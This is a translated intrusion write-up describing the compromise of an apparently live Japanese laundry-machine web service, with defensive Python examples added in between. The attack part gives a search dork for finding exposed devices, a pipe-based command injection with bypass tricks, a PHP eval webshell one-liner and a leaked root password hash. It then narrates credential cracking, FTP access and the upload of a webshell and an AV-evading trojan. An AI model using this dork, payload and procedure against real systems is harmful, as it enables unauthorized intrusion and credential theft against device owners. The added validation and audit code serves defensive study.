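Note: this article is shared as a technical discussion only. Unauthorized penetration of external systems is prohibited, and violators bear the consequences themselves.
1. Information gathering
The Tosei (东正) washing machine RCE vulnerability that drew a lot of attention a while ago
Search syntax
fofa: body="tosei_login_check.php"
The page looks like this
The PoC is as follows
The routine test function in the admin backend is bypassed with a pipe character
RCE succeeded
2. Gaining a foothold
A quick review of common command-injection bypass methods
1. Pipe character
2. String concatenation windows: ~%xxx:0~1 linux: $xxx:start,length
3. Special characters ^, "", (), $@
4. Space bypass: ${IFS}, {}
5. Variable assignment
6. Default paths and wildcards
7. Hex encoding with xxd
8. Base64 encoding
9. Semicolon bypass
10. `` bypass
11. bypass
12. dnslog bypass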
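Every item in the list above defeats a character blacklist, so the durable fix for a diagnostic feature like the backend test function is to accept only a parsed IP address and never pass it through a shell. The following is an added example, not code from the device or from the original post; the function names and the sample inputs are constructed for illustration.

```python
import ipaddress
import subprocess

# Constructed inputs, one per bypass style from the list above, plus an
# option-like value. None of them is a valid IPv4 literal.
BYPASS_SAMPLES = [
    "127.0.0.1|id",        # pipe
    "127.0.0.1;id",        # semicolon
    "127.0.0.1${IFS}id",   # ${IFS} in place of a space
    "127.0.0.1`id`",       # backticks
    "-f",                  # would be read by ping as an option
]


def build_ping_argv(user_value):
    """Return the argv list for one ping, or raise ValueError."""
    if not isinstance(user_value, str) or len(user_value) > 15:
        raise ValueError("target must be a dotted-quad string")
    try:
        addr = ipaddress.IPv4Address(user_value)
    except ValueError:
        raise ValueError("target is not an IPv4 address") from None
    # Use the parsed object, not the raw string, to build the argument.
    return ["ping", "-c", "1", str(addr)]


def run_ping(user_value):
    """Run ping without a shell; the value is a single argv element."""
    argv = build_ping_argv(user_value)
    done = subprocess.run(argv, shell=False, timeout=5, check=False,
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return done.returncode


def rejected(samples):
    """Return the samples that build_ping_argv refuses."""
    out = []
    for s in samples:
        try:
            build_ping_argv(s)
        except ValueError:
            out.append(s)
    return out
```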
Now for the problem of uploading a webshell
IFS=,;`cat<<<'<?php @eval($_POST[1]);?>'>5.php`
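This did not work; the target system could not execute it
After struggling with downloads for a long time, I found that the machine has no outbound network access and has neither ping nor curl
No permission to write to the directory, and the corresponding tmp directory could not be written either
Having come this far, it would be a pity not to write a shell
Start information gathering!
1. Local host information gathering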
pwd
Show the current directory
ls${IFS}-lah
total 1.8M
drwxrwxrwx 3 root root 4.0k Jun 13 2018 .
drwxrwxrwx 5 root root 1.0k Nov 20 2018 ..
lrwxrwxrwx 1 root root 12 Dec 29 2004 .htaccess -> ../.htaccess
-rwxr-xr-x 1 root root 6.8k Sep 28 2005 alert_rss.rdf
-rwxr-xr-x 1 root root 1.3k Jan 11 2005 downloader.php
lrwxrwxrwx 1 root root 23 Dec 29 2004 images -> /usr/apache/html/images
-rwxr-xr-x 1 root root 5.7k Oct 24 2005 imode_alldata.php
-rwxr-xr-x 1 root root 7.6k Jan 12 2005 imode_eventlog.php
-rwxr-xr-x 1 root root 3.2k Dec 6 2005 imode_eventstat.php
-rwxr-xr-x 1 root root 2.1k Jan 12 2005 imode_info.php
drwxrwxrwx 2 root root 2.0k Jun 13 2018 include
-rwxrwxrwx 1 root root 4.7k Oct 25 2017 index_x1.php
-rwxrwxrwx 1 root root 4.8k Feb 25 2011 index_x11.php
-rwxrwxrwx 1 root root 6.4k Oct 25 2017 index_x12.php
-rwxrwxrwx 1 root root 11k Feb 25 2011 index_x13.php
-rwxrwxrwx 1 root root 4.3k Feb 25 2011 index_x14.php
-rwxrwxrwx 1 root root 5.4k Feb 25 2011 index_x15.php
-rwxrwxrwx 1 root root 2.0k Dec 24 05:45 login.php
-rwxrwxrwx 1 root root 32k Sep 14 2017 mainte_jikan_kadou.php
-rwxrwxrwx 1 root root 43k Sep 14 2017 mainte_jikan_uriage.php
-rwxr-xr-x 1 root root 2.2k Apr 15 2016 network_test.php
-rwxrwxrwx 1 root root 5.8k Apr 15 2016 p1_conf_update.php
-rwxrwxrwx 1 root root 6.8k Apr 15 2016 p1_ftpserver.php
-rwxrwxrwx 1 root root 9.1k Jun 23 2016 p1_info_device.php
-rwsr-xr-x 1 root root 17k Apr 5 2016 p1_network_dns.cgi
-rwsr-xr-x 1 root root 14k Jun 14 2016 p1_network_inetd.cgi
-rwsrwxrwx 1 root root 20k Apr 5 2016 p1_network_mail.cgi
-rwsr-xr-x 1 root root 24k Apr 15 2016 p1_schedule_setting.cgi
-rwsr-xr-x 1 root root 14k Apr 5 2016 p1_setdate.cgi
-rwsr-xr-x 1 root root 17k Apr 5 2016 p1_setipadr.cgi
-rwxrwxrwx 1 root root 1.1k May 6 2011 p1_system_check.php
-rwsr-xr-x 1 root root 20k Apr 5 2016 p1_system_ntp.cgi
-rwsr-xr-x 1 root root 14k Jun 14 2016 p1_system_user.cgi
-rwxrwxrwx 1 root root 1.2k Apr 26 2011 p1_user_check.php
-rw-r--r-- 1 root contec 17k May 21 2007 style_tosei.css
-rwxrwxrwx 1 root root 2.7k Sep 18 2007 tosei-i_running.php
-rwxrwxrwx 1 root root 2.3k Sep 18 2007 tosei-i_running1.php
-rwxrwxrwx 1 root root 18k Feb 14 2011 tosei-i_sousa.php
-rwxrwxrwx 1 root root 16k Feb 21 2011 tosei-i_sousa_2.php
-rwxrwxrwx 1 root root 8.5k Jan 30 2011 tosei-i_sousa_3.php
-rwxrwxrwx 1 root root 7.4k Jan 30 2011 tosei-i_sousa_check.php
-rwxrwxrwx 1 root root 1.6k Sep 12 2007 tosei-i_sousa_check1.php
-rwxrwxrwx 1 root root 5.1k Jan 30 2011 tosei-i_sousa_check2.php
-rw-r--r-- 1 fws fws 35k Dec 1 2010 tosei_common.def
-rwxrwxrwx 1 root root 2.6k Aug 28 2017 tosei_creditinfo.php
-rwxrwxrwx 1 root root 21k Sep 15 2017 tosei_datasend.php
-rwxrwxrwx 1 root root 1.9k Sep 14 2017 tosei_error.php
-rwxrwxrwx 1 root root 36k Oct 10 2017 tosei_getubetu_kadou.php
-rwxrwxrwx 1 root root 30k Nov 13 2017 tosei_getubetu_uriage.php
-rwxrwxrwx 1 root root 4.0k Apr 15 2016 tosei_gokiinfo.php
-rwxrwxrwx 1 root root 13k Sep 14 2017 tosei_gulisu_settei.php
-rwxrwxrwx 1 root root 8.6k Aug 9 2017 tosei_gulisu_tenken.php
-rwxrwxrwx 1 root root 17k Apr 20 2016 tosei_haraidashi.php
-rwxrwxrwx 1 root root 4.3k Sep 19 2007 tosei_help.php
-rwxrwxrwx 1 root root 43k Oct 10 2017 tosei_hiduke_kadou.php
-rwxrwxrwx 1 root root 27k Nov 13 2017 tosei_hiduke_uriage.php
-rwxrwxrwx 1 root root 7.4k Apr 4 2018 tosei_honjitsu_tenko.php
-rwxrwxrwx 1 root root 8.4k Sep 14 2017 tosei_ipento_setei.php
-rwxrwxrwx 1 root root 34k Oct 10 2017 tosei_jikan_kadou.php
-rwxrwxrwx 1 root root 50k Nov 13 2017 tosei_jikan_uriage.php
-rwxrwxrwx 1 root root 26k Dec 4 2015 tosei_kikai.php
-rwxrwxrwx 1 root root 10k Sep 14 2017 tosei_kikai_era.php
-rwxrwxrwx 1 root root 10k Sep 20 2017 tosei_kikai_jyouhou.php
-rwxrwxrwx 1 root root 8.4k Mar 26 2018 tosei_kikai_kanri.php
-rwxrwxrwx 1 root root 11k Sep 14 2017 tosei_kikai_name.php
-rwxrwxrwx 1 root root 11k Sep 8 2017 tosei_kikai_seisanki.php
-rwxrwxrwx 1 root root 6.3k Apr 6 2016 tosei_kikai_siyou.php
-rwxrwxrwx 1 root root 18k Nov 16 2017 tosei_kikai_sousa.php
-rwxrwxrwx 1 root root 10k Apr 15 2016 tosei_kishuinfo.php
-rwxr-xr-x 1 root root 354 Feb 18 2016 tosei_login_check.php
-rwsrwxrwx 1 root root 13k Apr 5 2016 tosei_mainte_user.cgi
-rwxrwxrwx 1 root root 13k Sep 14 2017 tosei_oiru_settei.php
-rwxrwxrwx 1 root root 8.6k Aug 9 2017 tosei_oiru_tenken.php
-rwxrwxrwx 1 root root 4.7k May 26 2016 tosei_owner_card.php
-rwxrwxrwx 1 root root 11k Apr 3 2018 tosei_owner_helocall.php
-rwxrwxrwx 1 root root 2.6k Aug 28 2017 tosei_payment_info.php
-rwsr-xr-x 1 root root 14k Jun 20 2016 tosei_payment_user.cgi
-rwsrwxrwx 1 root root 12k Apr 5 2016 tosei_reboot.cgi
-rwxrwxrwx 1 root root 16k Sep 14 2017 tosei_rinfareta_settei.php
-rwxrwxrwx 1 root root 15k May 31 2012 tosei_rinfareta_tenken.php
-rwxrwxrwx 1 root root 2.0k Apr 5 2016 tosei_running.php
-rwxrwxrwx 1 root root 8.0k Sep 14 2017 tosei_ryoukin_henkou.php
-rwxrwxrwx 1 root root 84k Sep 14 2017 tosei_save_data.php
-rwxrwxrwx 1 root root 39k Sep 14 2017 tosei_setup.php
-rwxrwxrwx 1 root root 9.1k Apr 4 2018 tosei_shisutemu_helocall.php
-rwxrwxrwx 1 root root 3.1k Apr 15 2016 tosei_shopinfo.php
-rwxrwxrwx 1 root root 44k Sep 14 2017 tosei_sousa.php
-rwxrwxrwx 1 root root 32k Mar 11 2016 tosei_sousa_2.php
-rwxrwxrwx 1 root root 7.9k May 26 2016 tosei_sousa_check.php
-rwxrwxrwx 1 root root 3.9k Sep 14 2017 tosei_sousa_history.php
-rwsrwxrwx 1 root root 13k Apr 5 2016 tosei_sub_user.cgi
-rwxrwxrwx 1 root root 8.9k Sep 14 2017 tosei_syuusei.php
-rwxr-xr-x 1 root root 5.8k Mar 14 2007 tosei_syuusei.php.org
-rwxrwxrwx 1 root root 23k Sep 5 2017 tosei_top.php
-rwxrwxrwx 1 root root 137k Nov 14 2017 tosei_uriage.php
-rwxrwxrwx 1 fws fws 104k Dec 1 2010 tosei_uriage.php.org
-rwxrwxrwx 1 root root 50k Sep 14 2017 tosei_waribiki_1.php
-rwxrwxrwx 1 root root 42k Sep 12 2007 tosei_waribiki_1a.php
-rwxrwxrwx 1 root root 40k Sep 14 2017 tosei_waribiki_2.php
-rwxrwxrwx 1 root root 31k Sep 14 2017 tosei_waribiki_check.php
-rwxrwxrwx 1 root root 45k Oct 10 2017 tosei_youbi_kadou.php
-rwxrwxrwx 1 root root 29k Nov 13 2017 tosei_youbi_uriage.php
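No write permission on any of them
Try under the tmp directory
Files cannot be downloaded into tmp either; it is only possible to touch a file
No permission to write to the web directory either
Is this where we have to give up?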
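The listing above can be checked mechanically for the two permission problems a defender would fix first in this web root: setuid-root CGI binaries and world-writable entries. This is an added example, not part of the original post; the input is a subset of lines copied from that listing, and the function names are hypothetical. Mode bits are not the whole story (the author reports that writes failed anyway), but they are what an audit sees first.

```python
# Subset of lines copied from the ls -lah output above.
LISTING = """\
total 1.8M
drwxrwxrwx 2 root root 2.0k Jun 13 2018 include
lrwxrwxrwx 1 root root 12 Dec 29 2004 .htaccess -> ../.htaccess
-rwxr-xr-x 1 root root 2.2k Apr 15 2016 network_test.php
-rwxrwxrwx 1 root root 2.0k Dec 24 05:45 login.php
-rwsr-xr-x 1 root root 17k Apr 5 2016 p1_network_dns.cgi
-rwsrwxrwx 1 root root 20k Apr 5 2016 p1_network_mail.cgi
-rw-r--r-- 1 fws fws 35k Dec 1 2010 tosei_common.def
"""


def audit_listing(text):
    """Return {name: [findings]} for risky entries in `ls -l` output."""
    findings = {}
    for line in text.splitlines():
        parts = line.split(None, 8)
        # Skip "total ..." and anything that is not a full ls -l row.
        if len(parts) < 9 or len(parts[0]) < 10:
            continue
        mode, owner, name = parts[0], parts[2], parts[8]
        if mode[0] == "l":
            continue  # symlink mode bits are not enforced
        tags = []
        if mode[3] in "sS" and owner == "root":
            tags.append("setuid-root")      # runs as root for any caller
        if mode[8] == "w":
            tags.append("world-writable")   # "other" write bit is set
        if tags:
            findings[name] = tags
    return findings


def setuid_and_writable(findings):
    """Names that are both setuid-root and world-writable: fix these first."""
    return sorted(n for n, t in findings.items()
                  if "setuid-root" in t and "world-writable" in t)
```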
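2. Cracking passwords
cat /etc/passwd
Found a surprise
/etc/passwd normally stores general user account information
/etc/shadow stores user password information
Format of the former
username:password:user ID:group ID:comment:home directory:login shell
When the password is stored in /etc/shadow, the password field is replaced with x
For example: root:x:0:0:root:/root:/bin/bash
Format of the latter
username:password:date of last password change (days since January 1, 1970):minimum number of days between password changes (0 means it can be changed at any time):number of days after which the password must be changed (99999 means no change is required):number of days of warning before the password must be changed:account expiration date:number of days after account expiration before it is disabled:reserved field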
root:$6$Fsf6Q6SH$MlagWih0lcGFxtAo7/s8Z5.wywJyCqH6qateZ6yPFOPm8bNYTGAEPygZxSOPR1A9Rtw.WxJp2fNMOoeB1wj890:17524:0:99999:7:::
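Here the passwords are leaked directly in /etc/passwd, so we can try to crack them
Two accounts cracked successfully
But the target refuses connections on port 22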
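/etc/passwd is world-readable, so a hash stored in its second field is exposed to every local user and to any file-read or command-execution bug, which is what happened here. The following audit is an added example, not from the original post; the sample lines and hash strings are constructed placeholders, and the function name is hypothetical.

```python
import re

# Constructed sample; the hash strings are placeholders, not real credentials.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "svc:" + "A" * 13 + ":500:500::/home/svc:/bin/sh",
    "admin:$1$PLACEHLD$" + "A" * 22 + ":501:501::/home/admin:/bin/sh",
    "guest::502:502::/home/guest:/bin/sh",
    "nobody:*:99:99::/:/sbin/nologin",
])

# crypt(3) prefixes; a bare 13-character string is traditional DES crypt.
SCHEMES = [
    (re.compile(r"^\$1\$"), "md5crypt"),
    (re.compile(r"^\$2[abxy]?\$"), "bcrypt"),
    (re.compile(r"^\$5\$"), "sha256crypt"),
    (re.compile(r"^\$6\$"), "sha512crypt"),
    (re.compile(r"^\$y\$"), "yescrypt"),
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "descrypt"),
]
LEGACY = {"descrypt", "md5crypt"}


def audit_passwd(text):
    """Return [(user, finding)] for entries whose field 2 is not shadowed."""
    out = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            out.append((fields[0], "malformed-entry"))
            continue
        user, pw = fields[0], fields[1]
        if pw == "x" or pw.startswith(("!", "*")):
            continue  # shadowed or locked: nothing exposed here
        if pw == "":
            out.append((user, "empty-password"))
            continue
        scheme = next((n for rx, n in SCHEMES if rx.match(pw)), "unknown")
        tag = "exposed-hash:" + scheme
        if scheme in LEGACY:
            tag += ":legacy"
        out.append((user, tag))
    return out
```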
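3. Finding the htaccess file
Found something interesting
Just ask ChatGPT about it
This configuration file directly reveals the target users that the access control requires
And the corresponding file is located at
So what are we waiting for? We go straight to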
cat /usr/apache/.pass
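Found something good
Cracked successfully again
The others can be taken for cracking as well
Passwords are on the left, accounts on the right
Perfect
3. Login test
1. Go to the admin page and enter the account and password
Got in successfully
Then browse around
Pick out the key files and test them
1. This is where the earlier command injection comes from
2. Something good found on the FTP server page
Found the FTP IP, password, port, and domain information
Account, password, port
The password can be viewed in plaintext directly with F12
FTP in directly
Got in successfully
3. Uploading and downloading with put and lcd
These are the simplest FTP operations
Successfully planted a one-line webshell
4. Upload an AV-evading trojan
Successfully came online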
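The FTP step above worked because the settings page sent the stored password back to the browser, where F12 shows it in plaintext. The following check for that pattern is an added example, not from the original post; the markup, field names and values are constructed, and the class and function names are hypothetical.

```python
from html.parser import HTMLParser

# Constructed markup for a settings page; field names and values are invented.
SAMPLE_HTML = """
<form method="post" action="save.php">
  <input type="text" name="ftp_host" value="192.0.2.20">
  <input type="text" name="ftp_user" value="backup">
  <input type="password" name="ftp_pass" value="example-secret">
  <input type="password" name="new_pass" value="">
  <input type="hidden" name="smtp_password" value="example-secret-2">
</form>
"""

SECRET_NAME_HINTS = ("pass", "pwd", "secret", "token")


class PrefilledSecretFinder(HTMLParser):
    """Collect <input> fields that send a stored secret back to the browser."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = {k: (v or "") for k, v in attrs}
        name = a.get("name", "")
        looks_secret = a.get("type", "").lower() == "password" or any(
            hint in name.lower() for hint in SECRET_NAME_HINTS)
        # A non-empty value means the server rendered the secret into the page.
        if looks_secret and a.get("value", ""):
            self.findings.append(name)


def find_prefilled_secrets(html):
    """Return the names of secret-looking inputs that carry a value."""
    finder = PrefilledSecretFinder()
    finder.feed(html)
    return finder.findings
```

A page that passes this check renders secret fields empty and only overwrites the stored value when the user submits a new one.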
Originally published on the WeChat official account (迪哥讲事): Penetration in practice: from RCE on a JP web service to the internal network